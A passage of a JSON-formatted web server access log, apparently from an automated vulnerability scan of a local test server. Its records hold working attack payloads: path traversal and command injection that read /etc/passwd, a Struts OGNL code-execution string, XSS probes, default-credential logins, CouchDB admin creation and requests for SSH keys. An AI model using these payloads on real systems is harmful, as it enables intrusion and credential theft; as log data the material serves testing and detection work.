"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DEBUG /Foobar-debug.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"DEBUG", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Reports/Pages/Folder.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"j_username=weblogic&j_password=weblogic&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com;@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/docker.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event3=352513&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Grimag/go.php?https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/settings/values HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"j_username=weblogic&j_password=weblogic1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https%3a%2f%2fexample.com%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-generated.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22user\x22,\x0D\x0A \x22name\x22: \x22poc\x22,\x0D\x0A \x22roles\x22: [\x22_admin\x22],\x0D\x0A \x22roles\x22: [],\x0D\x0A \x22password\x22: \x22123456\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_users/org.couchdb.user:poc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/repository HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"{\x22query\x22:\x22# Welcome to GraphiQL\x5Cn#\x5Cn# GraphiQL is an in-browser tool for writing, validating, and\x5Cn# testing GraphQL queries.\x5Cn#\x5Cn# Type queries into this side of the screen, and you will see intelligent\x5Cn# typeaheads aware of the current GraphQL type schema and live syntax and\x5Cn# validation errors highlighted within the text.\x5Cn#\x5Cn# GraphQL queries typically start with a \x5C\x22{\x5C\x22 character. Lines that starts\x5Cn# with a # are ignored.\x5Cn#\x5Cn# An example GraphQL query might look like:\x5Cn#\x5Cn# {\x5Cn# field(arg: \x5C\x22value\x5C\x22) {\x5Cn# subField\x5Cn# }\x5Cn# }\x5Cn#\x5Cn# Keyboard shortcuts:\x5Cn#\x5Cn# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\x5Cn#\x5Cn# Run Query: Ctrl-Enter (or press the play button above)\x5Cn#\x5Cn# Auto Complete: Ctrl-Space (or just start typing)\x5Cn#\x5Cn\x5Cn{\x5Cn users {\x5Cn nodes {\x5Cn id\x5Cn name\x5Cn username\x5Cn }\x5Cn }\x5Cn}\x22,\x22variables\x22:null,\x22operationName\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1/-/graphql-explorer", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"j_username=weblogic&j_password=welcome1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.531","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /command.cgi?cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"test_data","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webstats/awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"username=admin&password={{admin}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/lti/auth.php?redirect_uri=javascript:alert('29KBxbEOfo5Llbsp1edRCDW1WP0') HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) 